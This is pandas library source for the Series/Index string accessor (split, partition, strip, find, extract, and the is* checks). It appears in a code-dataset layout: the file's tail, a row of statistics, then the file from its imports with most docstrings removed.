or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be as any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = {"type": "alphanumeric", "method": "isalnum"}
_doc_args["isalpha"] = {"type": "alphabetic", "method": "isalpha"}
_doc_args["isdigit"] = {"type": "digits", "method": "isdigit"}
_doc_args["isspace"] = {"type": "whitespace", "method": "isspace"}
_doc_args["islower"] = {"type": "lowercase", "method": "islower"}
_doc_args["isupper"] = {"type": "uppercase", "method": "isupper"}
_doc_args["istitle"] = {"type": "titlecase", "method": "istitle"}
_doc_args["isnumeric"] = {"type": "numeric", "method": "isnumeric"}
_doc_args["isdecimal"] = {"type": "decimal", "method": "isdecimal"}
# force _noarg_wrapper return type with dtype=np.dtype(bool) (GH 29624)
isalnum = _map_and_wrap(
"isalnum", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
isalpha = _map_and_wrap(
"isalpha", docstring=_shared_docs["ismethods"] % _doc_args["isalpha"]
)
isdigit = _map_and_wrap(
"isdigit", docstring=_shared_docs["ismethods"] % _doc_args["isdigit"]
)
isspace = _map_and_wrap(
"isspace", docstring=_shared_docs["ismethods"] % _doc_args["isalnum"]
)
islower = _map_and_wrap(
"islower", docstring=_shared_docs["ismethods"] % _doc_args["islower"]
)
isupper = _map_and_wrap(
"isupper", docstring=_shared_docs["ismethods"] % _doc_args["isupper"]
)
istitle = _map_and_wrap(
"istitle", docstring=_shared_docs["ismethods"] % _doc_args["istitle"]
)
isnumeric = _map_and_wrap(
"isnumeric", docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"]
)
isdecimal = _map_and_wrap(
"isdecimal", docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"]
)
def cat_safe(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`.
Same signature as cat_core, but handles TypeErrors in concatenation, which
happen if the arrays in list_of columns have the wrong dtypes or content.
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns.
Returns
-------
nd.array
The concatenation of list_of_columns with sep.
"""
try:
result = cat_core(list_of_columns, sep)
except TypeError:
# if there are any non-string values (wrong dtype or hidden behind
# object dtype), np.sum will fail; catch and return with better message
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
f"column {dtype}"
) from None
return result
def cat_core(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns.
Returns
-------
nd.array
The concatenation of list_of_columns with sep.
"""
if sep == "":
# no need to interleave sep if it is empty
arr_of_cols = np.asarray(list_of_columns, dtype=object)
return np.sum(arr_of_cols, axis=0)
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
arr_with_sep = np.asarray(list_with_sep, dtype=object)
return np.sum(arr_with_sep, axis=0)
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _result_dtype(arr):
# workaround #27953
# ideally we just pass `dtype=arr.dtype` unconditionally, but this fails
# when the list of values is empty.
from pandas.core.arrays.string_ import StringDtype
from pandas.core.arrays.string_arrow import ArrowStringDtype
if isinstance(arr.dtype, (StringDtype, ArrowStringDtype)):
return arr.dtype.name
else:
return object
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _str_extract_noexpand(arr, pat, flags=0):
"""
Find groups in each string in the Series using passed regular
expression. This function is called from
str_extract(expand=False), and can return Series, DataFrame, or
Index.
"""
from pandas import (
DataFrame,
array as pd_array,
)
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
result_dtype = _result_dtype(arr)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
# not dispatching, so we have to reconstruct here.
result = pd_array(result, dtype=result_dtype)
else:
if isinstance(arr, ABCIndex):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.size == 0:
# error: Incompatible types in assignment (expression has type
# "DataFrame", variable has type "ndarray")
result = DataFrame( # type: ignore[assignment]
columns=columns, dtype=object
)
else:
dtype = _result_dtype(arr)
# error: Incompatible types in assignment (expression has type
# "DataFrame", variable has type "ndarray")
result = DataFrame( # type:ignore[assignment]
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=dtype,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
"""
For each subject string in the Series, extract groups from the
first match of regular expression pat. This function is called from
str_extract(expand=True), and always returns a DataFrame.
"""
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
dtype = _result_dtype(arr)
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=dtype,
)
def str_extract(arr, pat, flags=0, expand=True):
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
result = _str_extract_frame(arr._orig, pat, flags=flags)
return result.__finalize__(arr._orig, method="str_extract")
else:
result, name = _str_extract_noexpand(arr._orig, pat, flags=flags)
return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
regex = re.compile(pat, flags=flags)
# the regex must contain capture groups.
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndex):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
dtype = _result_dtype(arr)
result = arr._constructor_expanddim(
match_list, index=index, columns=columns, dtype=dtype
)
return result
| 32.310943 | 88 | 0.555691 | import codecs
from functools import wraps
import re
from typing import (
Dict,
List,
Optional,
)
import warnings
import numpy as np
import pandas._libs.lib as lib
from pandas.util._decorators import Appender
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCMultiIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import isna
from pandas.core.base import NoNewAttributesMixin
_shared_docs: Dict[str, str] = {}
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
def forbid_nonstring_types(forbidden, name=None):
forbidden = [] if forbidden is None else forbidden
allowed_types = {"string", "empty", "bytes", "mixed", "mixed-integer"} - set(
forbidden
)
def _forbid_nonstring_types(func):
func_name = func.__name__ if name is None else name
@wraps(func)
def wrapper(self, *args, **kwargs):
if self._inferred_dtype not in allowed_types:
msg = (
f"Cannot use .str.{func_name} with values of "
f"inferred dtype '{self._inferred_dtype}'."
)
raise TypeError(msg)
return func(self, *args, **kwargs)
wrapper.__name__ = func_name
return wrapper
return _forbid_nonstring_types
def _map_and_wrap(name, docstring):
@forbid_nonstring_types(["bytes"], name=name)
def wrapper(self):
result = getattr(self._data.array, f"_str_{name}")()
return self._wrap_result(result)
wrapper.__doc__ = docstring
return wrapper
class StringMethods(NoNewAttributesMixin):
def __init__(self, data):
from pandas.core.arrays.string_ import StringDtype
from pandas.core.arrays.string_arrow import ArrowStringDtype
self._inferred_dtype = self._validate(data)
self._is_categorical = is_categorical_dtype(data.dtype)
self._is_string = isinstance(data.dtype, (StringDtype, ArrowStringDtype))
self._data = data
self._index = self._name = None
if isinstance(data, ABCSeries):
self._index = data.index
self._name = data.name
self._parent = data._values.categories if self._is_categorical else data
self._orig = data
self._freeze()
@staticmethod
def _validate(data):
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, not MultiIndex"
)
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data)
values = getattr(values, "categories", values)
inferred_dtype = lib.infer_dtype(values, skipna=True)
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string values!")
return inferred_dtype
def __getitem__(self, key):
result = self._data.array._str_getitem(key)
return self._wrap_result(result)
def __iter__(self):
warnings.warn(
"Columnar iteration over characters will be deprecated in future releases.",
FutureWarning,
stacklevel=2,
)
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
def _wrap_result(
self,
result,
name=None,
expand=None,
fill_value=np.nan,
returns_string=True,
):
from pandas import (
Index,
MultiIndex,
)
if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
if isinstance(result, ABCDataFrame):
result = result.__finalize__(self._orig, name="str")
return result
assert result.ndim < 3
# Or we can be wrapping a numeric output, in which case we don't want
if expand is None:
expand = result.ndim != 1
elif expand is True and not isinstance(self._orig, ABCIndex):
def cons_row(x):
if is_list_like(x):
return x
else:
return [x]
result = [cons_row(x) for x in result]
if result:
max_len = max(len(x) for x in result)
result = [
x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
]
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand is False:
if name is None:
name = getattr(result, "name", None)
if name is None:
name = self._orig.name
if isinstance(self._orig, ABCIndex):
if is_bool_dtype(result):
return result
if expand:
result = list(result)
out = MultiIndex.from_tuples(result, names=name)
if out.nlevels == 1:
out = out.get_level_values(0)
return out
else:
return Index(result, name=name)
else:
index = self._orig.index
dtype: Optional[str]
if self._is_string and returns_string:
dtype = self._orig.dtype
else:
dtype = None
if expand:
cons = self._orig._constructor_expanddim
result = cons(result, columns=name, index=index, dtype=dtype)
else:
cons = self._orig._constructor
result = cons(result, name=name, index=index)
result = result.__finalize__(self._orig, method="str")
if name is not None and result.ndim == 1:
result.name = name
return result
def _get_series_list(self, others):
from pandas import (
DataFrame,
Series,
)
idx = self._orig if isinstance(self._orig, ABCIndex) else self._orig.index
if isinstance(others, ABCSeries):
return [others]
elif isinstance(others, ABCIndex):
return [Series(others._values, index=idx)]
elif isinstance(others, ABCDataFrame):
return [others[x] for x in others]
elif isinstance(others, np.ndarray) and others.ndim == 2:
others = DataFrame(others, index=idx)
return [others[x] for x in others]
elif is_list_like(others, allow_sets=False):
others = list(others)
if all(
isinstance(x, (ABCSeries, ABCIndex))
or (isinstance(x, np.ndarray) and x.ndim == 1)
for x in others
):
los: List[Series] = []
while others:
los = los + self._get_series_list(others.pop(0))
return los
elif all(not is_list_like(x) for x in others):
return [Series(others, index=idx)]
raise TypeError(
"others must be Series, Index, DataFrame, np.ndarray "
"or list-like (either containing only strings or "
"containing only objects of type Series/Index/"
"np.ndarray[1-dim])"
)
@forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
def cat(self, others=None, sep=None, na_rep=None, join="left"):
from pandas import (
Index,
Series,
concat,
)
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, ABCIndex):
data = Series(self._orig, index=self._orig)
else:
data = self._orig
if others is None:
data = ensure_object(data)
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
others = self._get_series_list(others)
except ValueError as err:
raise ValueError(
"If `others` contains arrays or lists (or other "
"list-likes without an index), these must all be "
"of the same length as the calling Series/Index."
) from err
if any(not data.index.equals(x.index) for x in others):
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others]
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
result = cat_safe(all_cols, sep)
if isinstance(self._orig, ABCIndex):
result = Index(
result, dtype=object, name=self._orig.name
)
else:
if is_categorical_dtype(self._orig.dtype):
dtype = None
else:
dtype = self._orig.dtype
result = Series(
result, dtype=dtype, index=data.index, name=self._orig.name
)
result = result.__finalize__(
self._orig, method="str_cat"
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the split strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(
... [
... "this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan
... ]
... )
>>> s
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat="/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3 4
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html None None None None
2 NaN NaN NaN NaN NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s
0 1+1=2
dtype: object
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = self._data.array._str_split(pat, n, expand)
return self._wrap_result(result, returns_string=expand, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = self._data.array._str_rsplit(pat, n=n)
return self._wrap_result(result, expand=expand, returns_string=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
)
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
result = self._data.array._str_partition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
result = self._data.array._str_rpartition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
def get(self, i):
result = self._data.array._str_get(i)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = self._data.array._str_join(sep)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=None, regex=True):
if regex and re.compile(pat).groups:
warnings.warn(
"This pattern has match groups. To actually get the "
"groups, use str.extract.",
UserWarning,
stacklevel=3,
)
result = self._data.array._str_contains(pat, case, flags, na, regex)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=None):
result = self._data.array._str_match(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def fullmatch(self, pat, case=True, flags=0, na=None):
result = self._data.array._str_fullmatch(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=None):
if regex is None:
if isinstance(pat, str) and any(c in pat for c in ".+*|^$?[](){}\\"):
msg = (
"The default value of regex will change from True to False "
"in a future version."
)
if len(pat) == 1:
msg += (
" In addition, single character regular expressions will"
"*not* be treated as literal strings when regex=True."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
regex = True
if not (isinstance(repl, str) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set when pat is a compiled regex"
)
elif case is None:
case = True
elif is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement pattern with regex=False"
)
elif callable(repl):
raise ValueError("Cannot use a callable replacement when regex=False")
result = self._data.array._str_replace(
pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = self._data.array._str_repeat(repeats)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
if not isinstance(fillchar, str):
msg = f"fillchar must be a character, not {type(fillchar).__name__}"
raise TypeError(msg)
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = f"width must be of integer type, not {type(width).__name__}"
raise TypeError(msg)
result = self._data.array._str_pad(width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Pad %(side)s side of strings in the Series/Index.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``.
fillchar : str
Additional character for filling, default is whitespace.
Returns
-------
filled : Series/Index of objects.
"""
@Appender(_shared_docs["str_pad"] % {"side": "left and right", "method": "center"})
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "right", "method": "ljust"})
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "left", "method": "rjust"})
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
result = self.pad(width, side="left", fillchar="0")
return self._wrap_result(result)
def slice(self, start=None, stop=None, step=None):
result = self._data.array._str_slice(start, stop, step)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = self._data.array._str_slice_replace(start, stop, repl)
return self._wrap_result(result)
def decode(self, encoding, errors="strict"):
if encoding in _cpython_optimized_decoders:
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
arr = self._data.array
result = arr._str_map(f)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = self._data.array._str_encode(encoding, errors)
return self._wrap_result(result, returns_string=False)
_shared_docs[
"str_strip"
] = r"""
Remove %(position)s characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series or Index of object
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"]
% {
"side": "left and right sides",
"method": "strip",
"position": "leading and trailing",
}
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = self._data.array._str_strip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "left side", "method": "lstrip", "position": "leading"}
)
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = self._data.array._str_lstrip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "right side", "method": "rstrip", "position": "trailing"}
)
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = self._data.array._str_rstrip(to_strip)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = self._data.array._str_wrap(width, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
result, name = self._data.array._str_get_dummies(sep)
return self._wrap_result(
result,
name=name,
expand=True,
returns_string=False,
)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = self._data.array._str_translate(table)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def count(self, pat, flags=0):
result = self._data.array._str_count(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def startswith(self, pat, na=None):
result = self._data.array._str_startswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def endswith(self, pat, na=None):
result = self._data.array._str_endswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def findall(self, pat, flags=0):
result = self._data.array._str_findall(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags, expand=expand)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index.
Each of returned indexes corresponds to the position where the
substring is fully contained between [start:end]. Return -1 on
failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of int.
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% {
"side": "lowest",
"method": "find",
"also": "rfind : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_find(sub, start, end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["find"]
% {
"side": "highest",
"method": "rfind",
"also": "find : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rfind(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
result = self._data.array._str_normalize(form)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each string in Series/Index.
Each of the returned indexes corresponds to the position where the
substring is fully contained between [start:end]. This is the same
as ``str.%(similar)s`` except instead of returning -1, it raises a
ValueError when the substring is not found. Equivalent to standard
``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of object
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% {
"side": "lowest",
"similar": "find",
"method": "index",
"also": "rindex : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_index(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["index"]
% {
